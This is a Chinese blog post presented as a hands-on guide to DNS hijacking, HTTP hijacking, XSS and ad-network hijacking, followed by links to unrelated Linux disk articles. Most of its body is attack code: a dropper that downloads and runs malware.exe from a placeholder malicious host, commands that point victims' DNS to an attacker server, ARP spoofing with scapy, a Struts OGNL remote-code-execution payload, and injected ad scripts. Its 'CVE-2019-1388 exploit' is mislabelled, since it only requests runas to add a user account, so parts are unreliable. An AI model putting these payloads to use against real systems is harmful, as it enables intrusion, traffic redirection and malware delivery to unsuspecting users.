百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程网 > 正文

关于DNS劫持、HTTP劫持、内容注入和广告劫持的详细分析-实战篇

yuyutoo 2024-10-21 11:59 10 浏览 0 评论

仅供学习研究交流使用,切勿用于违法犯罪,为维护网络安全做贡献!

一、DNS劫持

1. 修改本地DNS设置

步骤一:物理访问或恶意软件感染

恶意软件感染

  • 攻击者通过钓鱼邮件或恶意网站诱导用户下载并运行恶意软件。

python

复制代码

# 示例Python代码,恶意软件伪装成合法软件 import os def download_payload(): # 下载恶意软件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 执行下载的恶意软件 os.system("malware.exe") download_payload() execute_payload()

步骤二:获取管理员权限

提权方法

  • 恶意软件利用系统漏洞提升权限,例如通过Windows UAC绕过或使用已知的提权漏洞。

示例漏洞:CVE-2019-1388

  • CVE-2019-1388是一个Windows UAC绕过漏洞,攻击者可以通过伪造的签名窗口提升权限。

利用示例

  1. 创建恶意文件

c

复制代码

// Exploit.c: 利用CVE-2019-1388的UAC绕过漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); shExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd = NULL; shExecInfo.lpVerb = "runas"; // 请求管理员权限 shExecInfo.lpFile = "cmd.exe"; // 要运行的程序 shExecInfo.lpParameters = "/c net user hacker Password123! /add"; // 创建新用户 shExecInfo.lpDirectory = NULL; shExecInfo.nShow = SW_SHOWNORMAL; shExecInfo.hInstApp = NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }

  1. 编译并运行恶意文件

shell

复制代码

gcc Exploit.c -o Exploit.exe Exploit.exe

步骤三:修改DNS设置

使用命令提示符

shell

复制代码

# 修改DNS设置,将DNS服务器地址更改为攻击者控制的DNS服务器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5

修改注册表

shell

复制代码

# 示例命令,修改注册表中的DNS设置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f

步骤四:DNS解析劫持

  • 当用户访问合法域名时,DNS请求被发送到攻击者控制的DNS服务器,返回伪造的IP地址,重定向用户到恶意网站。

2. 攻击DNS服务器

步骤一:识别目标DNS服务器

  • 使用工具如nslookup、whois或dig来识别DNS服务器的IP地址和相关信息。

shell

复制代码

# 使用nslookup识别DNS服务器 nslookup example.com

步骤二:漏洞利用或暴力破解

  • 利用DNS服务器软件的已知漏洞,例如BIND DNS服务器中的漏洞CVE-2020-8617,或通过暴力破解获取管理员权限。

shell

复制代码

# 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit

步骤三:篡改DNS解析记录

  • 登录DNS服务器的管理界面,修改DNS解析记录,将合法域名解析为恶意IP地址。

shell

复制代码

# 例如,在BIND DNS服务器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析记录 zone "example.com" { type master; file "/etc/bind/db.example.com"; };

步骤四:劫持用户请求

  • 所有请求该DNS服务器解析域名的用户都会被重定向到恶意网站。

二、HTTP劫持

中间人攻击(MITM)

步骤一:建立中间人位置

ARP欺骗

python

复制代码

# 使用scapy库进行ARP欺骗 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:将目标IP的网关MAC地址更改为攻击者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')

步骤二:拦截HTTP请求

捕获HTTP流量

shell

复制代码

# 使用Wireshark或tcpdump捕获HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'

步骤三:篡改HTTP响应

使用Burp Suite拦截并修改HTTP响应

  • 在Burp Suite中设置拦截规则,拦截HTTP响应并插入恶意代码。

html

复制代码

<!-- 插入恶意JavaScript代码的示例 --> <script>alert('This site is hacked');</script>

步骤四:执行恶意代码

  • 用户浏览器接收并执行篡改后的HTTP响应,执行其中的恶意代码。

三、内容注入

XSS(跨站脚本)攻击

步骤一:发现注入点

  • 攻击者在论坛、评论区或其他用户输入区域进行测试,寻找可以插入JavaScript代码的注入点。

步骤二:构造恶意代码

html

复制代码

<!-- 示例:构造包含恶意JavaScript代码的输入 --> <script>alert('XSS');</script>

步骤三:注入恶意代码

  • 攻击者将恶意代码输入到注入点,提交表单或发布评论。

步骤四:执行恶意代码

  • 服务器未对输入进行适当过滤,直接返回包含恶意代码的响应。用户浏览器执行恶意代码,攻击者实现控制。

四、广告劫持

劫持第三方广告网络

步骤一:识别目标广告网络

  • 攻击者通过分析广告脚本和网络流量,确定广告网络的来源和结构。

javascript

复制代码

// 分析广告脚本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));

步骤二:漏洞利用或社会工程学

  • 利用广告网络的漏洞或通过社会工程学手段获取广告网络管理权限。

示例漏洞:CVE-2018-11776

  • 这是一个Apache Struts的远程代码执行漏洞,攻击者可以通过特定的输入导致远程代码执行。

利用示例

  1. 创建恶意请求

http

复制代码

POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  1. 发送恶意请求
  • 使用工具如curl或Burp Suite发送恶意请求,触发漏洞。

步骤三:替换广告内容

  • 攻击者登录广告网络管理界面,将合法广告替换为恶意广告,内容包括恶意JavaScript代码或重定向链接。

html

复制代码

<!-- 替换广告内容为恶意广告 --> <script src="http://malicious-website.com/malicious.js"></script>

步骤四:加载恶意广告

  • 用户浏览包含被劫持广告的网页时,恶意广告加载并执行,其中的恶意代码或重定向链接开始运行。

html

复制代码

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 恶意广告加载 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>

结论

通过详细的步骤和代码示例,我们可以更清楚地了解DNS劫持、HTTP劫持、内容注入和广告劫持的实现方式。这些攻击手段对用户和网络安全构成严重威胁,但通过了解其原理和实现细节,我们可以采取更有效的防护措施,保护我们的网络环境和数据安全。如果你有任何问题或想法,请在评论区分享,我们一起探讨。

相关推荐

当 Linux 根分区 (/) 已满时如何释放空间?

根分区(/)是Linux文件系统的核心,包含操作系统核心文件、配置文件、日志文件、缓存和用户数据等。当根分区满载时,系统可能出现无法写入新文件、应用程序崩溃甚至无法启动的情况。常见原因包括:...

玩转 Linux 之:磁盘分区、挂载知多少?

今天来聊聊linux下磁盘分区、挂载的问题,篇幅所限,不会聊的太底层,纯当科普!!1、Linux分区简介1.1主分区vs扩展分区硬盘分区表中最多能存储四个分区,但我们实际使用时一般只分为两...

Linux 文件搜索神器 find 实战详解,建议收藏

在Linux系统使用中,作为一个管理员,我希望能查找系统中所有的大小超过200M文件,查看近7天系统中哪些文件被修改过,找出所有子目录中的可执行文件,这些任务需求...

Linux 操作系统磁盘操作(linux 磁盘命令)

一、文档介绍本文档描述Linux操作系统下多种场景下的磁盘操作情况。二、名词解释...

Win10新版19603推送:一键清理磁盘空间、首次集成Linux文件管理器

继上周四的Build19592后,微软今晨面向快速通道的Insider会员推送Windows10新预览版,操作系统版本号Build19603。除了一些常规修复,本次更新还带了不少新功能,一起来了...

Android 16允许Linux终端使用手机全部存储空间

IT之家4月20日消息,谷歌Pixel手机正朝着成为强大便携式计算设备的目标迈进。2025年3月的更新中,Linux终端应用的推出为这一转变奠定了重要基础。该应用允许兼容的安卓设备...

Linux 系统管理大容量磁盘(2TB+)操作指南

对于容量超过2TB的磁盘,传统MBR分区表的32位寻址机制存在限制(最大支持2.2TB)。需采用GPT(GUIDPartitionTable)分区方案,其支持64位寻址,理论上限为9.4ZB(9....

Linux 服务器上查看磁盘类型的方法

方法1:使用lsblk命令lsblk输出说明:TYPE列显示设备类型,如disk(物理磁盘)、part(分区)、rom(只读存储)等。...

ESXI7虚机上的Ubuntu Linux 22.04 LVM空间扩容操作记录

本人在实际的使用中经常遇到Vmware上安装的Linux虚机的LVM扩容情况,最终实现lv的扩容,大多数情况因为虚机都是有备用或者可停机的情况,一般情况下通过添加一块物理盘再加入vg,然后扩容lv来实...

5.4K Star很容易!Windows读取Linux磁盘格式工具

[开源日记],分享10k+Star的优质开源项目...

Linux 文件系统监控:用脚本自动化磁盘空间管理

在Linux系统中,文件系统监控是一项非常重要的任务,它可以帮助我们及时发现磁盘空间不足的问题,避免因磁盘满而导致的系统服务不可用。通过编写脚本自动化磁盘空间管理,我们可以更加高效地处理这一问题。下面...

Linux磁盘管理LVM实战(linux实验磁盘管理)

LVM(逻辑卷管理器,LogicalVolumeManager)是一种在Linux系统中用于灵活管理磁盘空间的技术,通过将物理磁盘抽象为逻辑卷,实现动态调整存储容量、跨磁盘扩展等功能。本章节...

Linux查看文件大小:`ls`和`du`为何结果不同?一文讲透原理!

Linux查看文件大小:ls和du为何结果不同?一文讲透原理!在Linux运维中,查看文件大小是日常高频操作。但你是否遇到过以下困惑?...

使用 df 命令检查服务器磁盘满了,但用 du 命令发现实际小于磁盘容量

在Linux系统中,管理员或开发者经常会遇到一个令人困惑的问题:使用...

Linux磁盘爆满紧急救援指南:5步清理释放50GB+小白也能轻松搞定

“服务器卡死?网站崩溃?当Linux系统弹出‘Nospaceleft’的红色警报,别慌!本文手把手教你从‘删库到跑路’进阶为‘磁盘清理大师’,5个关键步骤+30条救命命令,快速释放磁盘空间,拯救你...

取消回复欢迎 发表评论: